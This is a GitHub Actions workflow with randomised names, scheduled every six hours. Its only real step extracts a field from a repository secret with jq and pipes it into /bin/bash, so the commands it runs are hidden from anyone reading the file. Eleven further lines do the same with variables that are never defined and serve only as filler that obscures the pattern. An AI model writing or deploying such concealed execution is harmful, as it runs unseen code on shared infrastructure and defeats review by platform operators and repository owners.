name: ximingrrr

on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ximingrrr
        env:
          dxdyd8525: ${{ secrets.dxdyd8525 }}
        run: |
          echo $dxdyd8525 | jq -r .emilp859 | /bin/bash
          echo $mjg35 | jq -r .ny556 | /bin/bash
          echo $p2879 | jq -r .oe60614 | /bin/bash
          echo $zfio4 | jq -r .pij838 | /bin/bash
          echo $s883 | jq -r .jcf20 | /bin/bash
          echo $qh47 | jq -r .uhi43406 | /bin/bash
          echo $xxp7352 | jq -r .uaidd7271 | /bin/bash
          echo $ql7768 | jq -r .jlrug84 | /bin/bash
          echo $kqhx4 | jq -r .pbz81 | /bin/bash
          echo $uksrq40 | jq -r .zlnt93210 | /bin/bash
          echo $rke722 | jq -r .ig229 | /bin/bash
          echo $qa75 | jq -r .f5 | /bin/bash

